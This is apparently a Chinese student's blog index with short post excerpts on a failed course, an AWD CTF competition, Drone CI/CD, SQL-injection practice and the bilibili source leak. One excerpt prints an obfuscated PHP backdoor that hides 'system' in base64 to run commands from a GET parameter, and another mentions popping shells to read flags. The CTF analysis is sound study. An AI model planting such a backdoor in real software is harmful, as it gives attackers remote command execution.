然而并不是什么好的开端 暑假开始了呀。明天早上 10 点的车回去。 已经迫不及待地想见到爸妈了。 又是两个月的长假，去年寒假因为期末线代挂了，看了整整一个寒假的线代，最后补考还好过了。 很可惜，这学期又挂科了。又得在假期准备开学的补考。 嘛，心里很不是滋味啊。 不是想去怪谁或为自己争辩些什么，都十九...

先从安全聊起 上周六协会 AWD，其中的 web1 中，有一个ob_start()的后门，具体代码是这样的： @ob_start(base64_decode('c3lzdGVt')); echo "$_GET[persistent]";...

今天六一，协会举办了大一第一次线下 AWD。 很开心最后我们组能获得第一。虽然上午被疯狂 Check Down 到自闭，但下午全靠 Moesang 大佬弹了四五个 Shell 疯狂cat /flag，同时 Y 也把 Pwn 给修好了。一下午就没怎么 Down 过，除了我中途修坏了一道 web...

编译型语言，就需要自动部署 我记得上学期刚注册助手 Gita 时，我还打趣地问过部长，助手什么时候上 CI / CD？ 当时部长说快了，这学期就上。 现在助手可以说每个项目完成后，都会使用 Drone 实现持续交付 / 持续集成。 对于前端来说，因为助手主要是用 Vue 做单页应用，...

Jarvis OJ 启动！！ 五一假期已经只剩一天了啊。真的快。 今天下午写 Go 时，室友在做南邮 CTF 上的 SQL 注入。那上面的两道 SQL 注入倒是挺基础的。但突然激起了我的兴趣 —— 想做做 SQL 注入了。 到 Jarvis OJ 上翻了下，还真有一道 ISCC 2016...

bilibili 干杯！🍻 最近 b 站源码泄露的事情闹得沸沸扬扬的，每天都有不同的瓜。昨天 GitHub 放出了 b 站写的 DMCA takedown 邮件。今天大家就在吐槽 b 站的小学级别英语了。 嘛，撇开这些事情不谈，b 站这次的源码泄露，确实让很多人开始注意到了 Golang 这门语言。...